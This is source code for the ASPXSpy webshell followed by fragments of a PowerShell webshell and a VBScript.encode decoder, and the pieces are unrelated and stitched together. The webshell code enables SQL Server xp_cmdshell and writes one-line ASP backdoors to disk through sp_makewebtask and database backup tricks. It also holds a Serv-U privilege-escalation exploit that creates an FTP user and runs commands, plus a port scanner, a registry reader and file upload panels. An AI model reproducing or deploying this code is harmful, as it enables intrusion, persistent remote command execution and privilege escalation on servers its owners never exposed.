true; Bin_Change(); Bin_ExecButton.Visible = false; Bin_ResLabel.Visible = false; Session["Bin_Option"] = null; Bin_dirPanel.Visible = false; } public void Bin_Change() { Bin_ExecButton.Visible = false; string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!=‘‘)Command(‘changedata‘,this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc (‘sp_OACreate‘,‘odsole70.dll‘)\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc (‘xp_cmdshell‘,‘xplog70.dll‘)\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell ‘net user‘\">Add xp_cmdshell<option value=\"EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell ‘net user‘\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate ‘‘,@s out;Exec SP_OAMethod @s,‘run‘,NULL,‘cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\1.asp‘;\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile=‘d:\\web\\bin.asp‘,@charset=gb2312,@query=‘select ‘‘<%execute(request(chr(35)))" + "%" + ">‘‘‘ \">SP_makewebtask make file"; if (Session["Bin_Option"] != null) { select += "<option SELECTED>" + Session["Bin_Option"] + "</option>"; } select += "</select>"; Bin_AccinfoLabel.Text = select; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; } protected void Bin_SAexecButton_Click(object sender, EventArgs e) { try { Bin_Change(); Bin_DBinfoLabel.Visible = false; Bin_ExecButton.Visible = false; Bin_Scroll.Visible = false; Bin_DataGrid.Visible = false; Bin_DBmenuPanel.Visible = true; string sqlstr = Bin_DBstrTextBox.Text; DataTable databind = Bin_DataTable(sqlstr); string res = ""; foreach (DataRow dr in databind.Rows) { for (int i = 0; i < databind.Columns.Count; i++) { res += dr[i] + "\r"; } } Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>"; } catch (Exception error) { Bin_Error(error.Message); } } protected void Bin_DirButton_Click(object sender, EventArgs e) { Bin_dirPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_DBinfoLabel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; } protected void Bin_listButton_Click(object sender, EventArgs e) { Bin_dirPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_DBinfoLabel.Visible = false; Bin_SqlDir(); } public void Bin_SqlDir() { try { Bin_DataGrid.Visible = true; Bin_Scroll.Visible = true; Bin_DataGrid.AllowPaging = false; string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N‘[bin_dir]‘) and OBJECTPROPERTY(id, N‘IsUserTable‘) = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree ‘" + Bin_DirTextBox.Text + "‘,1,1;"; Bin_ExecSql(exesql); DataTable sql_dir = Bin_DataTable("select * from bin_dir"); Bin_DataGrid.DataSource = sql_dir; Bin_DataGrid.DataBind(); } catch (Exception e) { Bin_Error(e.Message); } } protected void Bin_SuButton_Click(object sender, EventArgs e) { Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = true; Bin_IISPanel.Visible = false; Bin_SuresLabel.Text = ""; Bin_LoginPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; } protected void Bin_dbshellButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_AccPanel.Visible = false; Bin_BakDB(); } public void Bin_BakDB() { string path = Bin_DirTextBox.Text.Trim(); if (path.Substring(path.Length - 1, 1) == @"\") { path = path + "bin.asp"; } else { path = path + @"\bin.asp"; } string sql = "if exists (select * from sysobjects where id = object_id(N‘[bin_cmd]‘) and OBJECTPROPERTY(id, N‘IsUserTable‘) = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t=‘" + path + "‘ backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];"; Bin_ExecSql(sql); Bin_SqlDir(); } public void Bin_BakLog() { string path = Bin_DirTextBox.Text.Trim(); if (path.Substring(path.Length - 1, 1) == @"\") { path = path + "bin.asp"; } else { path = path + @"\bin.asp"; } string sql = "if exists (select * from sysobjects where id = object_id(N‘[bin_cmd]‘) and OBJECTPROPERTY(id, N‘IsUserTable‘) = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t=‘" + path + "‘ backup log @b to [email protected] with init,no_truncate;drop table [bin_cmd];"; Bin_ExecSql(sql); Bin_SqlDir(); } protected void Bin_LogshellButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_AccPanel.Visible = false; Bin_BakLog(); } protected void Bin_SuexpButton_Click(object sender, EventArgs e) { string Result = ""; string user = Bin_SunameTextBox.Text; string pass = Bin_SupassTextBox.Text; int port = Int32.Parse(Bin_SuportTextBox.Text); string cmd = Bin_SucmdTextBox.Text; string loginuser = "user " + user + "\r\n"; string loginpass = "pass " + pass + "\r\n"; string site = "SITE MAINTENANCE\r\n"; string deldomain = "-DELETEDOMAIN\r\n-IP=\r\n PortNo=52521\r\n"; string setdomain = "-SETDOMAIN\r\n-Domain=BIN||52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n"; string newdomain = "-SETUSERSETUP\r\n-IP=\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n"; string quite = "QUIT\r\n"; try { TcpClient tcp = new TcpClient("", port); tcp.ReceiveBufferSize = 1024; NetworkStream NS = tcp.GetStream(); Result = Rev(NS); Result += Send(NS, loginuser); Result += Rev(NS); Result += Send(NS, loginpass); Result += Rev(NS); Result += Send(NS, site); Result += Rev(NS); Result += Send(NS, deldomain); Result += Rev(NS); Result += Send(NS, setdomain); Result += Rev(NS); Result += Send(NS, newdomain); Result += Rev(NS); TcpClient tcp1 = new TcpClient("", 52521); NetworkStream NS1 = tcp1.GetStream(); Result += Rev(NS1); Result += Send(NS1, "user bin\r\n"); Result += Rev(NS1); Result += Send(NS1, "pass binftp\r\n"); Result += Rev(NS1); Result += Send(NS1, "site exec " + cmd + "\r\n"); Result += Rev(NS1); tcp1.Close(); Result += Send(NS, deldomain); Result += Rev(NS); Result += Send(NS, quite); Result += Rev(NS); tcp.Close(); } catch (Exception error) { Bin_Error(error.Message); } Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>"; } protected string Rev(NetworkStream instream) { string Restr = ""; if (instream.CanRead) { byte[] buffer = new byte[1024]; instream.Read(buffer, 0, buffer.Length); Restr = Encoding.ASCII.GetString(buffer); } return "<font color = red>" + Restr + "</font><br>"; } protected string Send(NetworkStream instream,string Sendstr) { if (instream.CanWrite) { byte[] buffer = Encoding.ASCII.GetBytes(Sendstr); instream.Write(buffer, 0, buffer.Length); } return "<font color = blue>" + Sendstr + "</font><br>"; } protected void Bin_IISButton_Click(object sender, EventArgs e) { Bin_LoginPanel.Visible = false; Bin_MainPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = true; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_iisLabel.Text = Bin_iisinfo(); } protected void Bin_PortButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = true; Bin_ScanresLabel.Text = ""; } protected void Bin_RegButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = true; Bin_PortPanel.Visible = false; Bin_RegresLabel.Text = ""; } protected void Bin_RegreadButton_Click(object sender, EventArgs e) { try { string regkey = Bin_KeyTextBox.Text; string subkey = regkey.Substring(regkey.IndexOf("\\") + 1, regkey.Length - regkey.IndexOf("\\") - 1); RegistryKey rk = null; if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE") { rk = Registry.LocalMachine.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT") { rk = Registry.ClassesRoot.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER") { rk = Registry.CurrentUser.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_USERS") { rk = Registry.Users.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG") { rk = Registry.CurrentConfig.OpenSubKey(subkey); } Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString(); } catch (Exception error) { Bin_Error(error.Message); } } protected void Bin_ScancmdButton_Click(object sender, EventArgs e) { try { string res = ""; string[] port = Bin_PortsTextBox.Text.Split(‘,‘); for (int i = 0; i < port.Length; i++) { res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>"; } Bin_ScanresLabel.Text = "<hr>" + res; } catch (Exception error) { Bin_Error(error.Message); } } protected string Bin_Scan(string ip, int port) { string scanres = ""; TcpClient tcp = new TcpClient(); tcp.SendTimeout = tcp.ReceiveTimeout = 2000; try { tcp.Connect(ip, port); tcp.Close(); scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>"; } catch (SocketException e) { scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>"; } return scanres; } </script> <html xmlns="" > <head runat="server"> <title>ASPXSpy1.0 -> Bin:)</title> <style type="text/css"> A:link { COLOR:#000000; TEXT-DECORATION:None } A:visited { COLOR:#000000; TEXT-DECORATION:None } A:active { COLOR:#000000; TEXT-DECORATION:None } A:hover { COLOR:#000000; TEXT-DECORATION:underline } BODY { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; } #nei { width:500px; margin:0px auto; overflow:hidden } #su { width:300px; margin:0px auto; overflow:hidden } #cmd { width:500px; margin:0px auto; overflow:hidden } </style> <script type="text/javascript" language="javascript" > function Command(cmd, str) { var strTmp = str; var frm = document.forms[0]; if(cmd == ‘del‘) { if(confirm(‘Del It ?‘)) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if (cmd == ‘change‘) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == ‘down‘) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == ‘showatt‘) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == ‘edit‘) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == ‘deldir‘) { if(confirm(‘Del It ?‘)) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if(cmd == ‘rename‘ ) { frm.goaction.value = cmd; frm.todo.value = str + ‘,‘; str = prompt(‘Please input new filename:‘, strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if(cmd == ‘renamedir‘ ) { frm.goaction.value = cmd; frm.todo.value = str + ‘,‘; str = prompt(‘Please input new foldername:‘, strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if (cmd == ‘postdata‘) { frm.todo.value = str.value; frm.goaction.value = cmd; frm.submit(); } if (cmd == ‘changedata‘) { frm.todo.value = str.value; frm.intext.value = str.options[str.selectedIndex].innerText frm.goaction.value = cmd; frm.submit(); } } </script> </head> <body> <form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px"> <asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label> <asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox> <asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p /> Copyright (C) 2008 Bin -> <a href="" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px"> <asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br /> <asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" /> <asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" /> <asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" /> <asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" /> <asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" /> <asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" /> <asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" /> <asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br /> <asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2008 Bin -> <a href="" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel> <asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px"> <div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center"> <asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br /> <asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label> <input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox> <asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" /> <asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br /> <asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label> <asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton" runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" /> <asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" /> <br /> <asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label> <asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox> <asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label> <asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox> <asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" /> <asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" /> <asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center"> <asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr /> FileName : <asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br /> <asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" /> <asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" /> <asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" /> <asp:CheckBox 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0x3: PowerShell Webshell
string do_ps(string arg) { //This section based on cmdasp webshell by ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; }
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3. VBScript.encode
Public Function DCScript(ByVal Script As String) As String Dim s As String, l As Long Dim b As Long, e As Long Dim k As Long l = LenB(Script): s = Space(l) ‘... b = InStr(Script, "#@~^") ‘#@~^******== e = InStr(Script, "^#[email protected]") ‘******==^#[email protected] If b = 0 Or e = 0 Then If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then Exit Function Else If e = 0 Then e = l Else e = e - 8 If b = 0 Then b = 1 Else b = b + 12 End If Else b = b + 12 ‘为0则全部解密 e = e - 8 ‘为0则算到末尾 End If frmMain.Caption = "Decoding ..." Script = Mid(Script, b, e - b + 1) ‘Script = Replace(Script, "@#", Chr(13)) ‘Script = Replace(Script, "@&", Chr(10)) Script = Replace(Script, "@#@&", Chr(13) + Chr(10)) ‘vbcCrlf Script = Replace(Script, "@!", "<") Script = Replace(Script, "@*", ">") Script = Replace(Script, "@$", "@") ‘最后生成@ ‘k = YXScrDecode(Script, s, Len(Script)) k = YXScrDecoder(Script, s) ‘s = Replace(s, Chr(13) + Chr(2), vbCrLf)‘查出来是0x10和0x0A的原因 ‘引出另一个问题,为什么char数组第-1个元素为0x02 frmMain.Caption = "碰到我算你倒霉!" DCScript = Left(s, k) End Function
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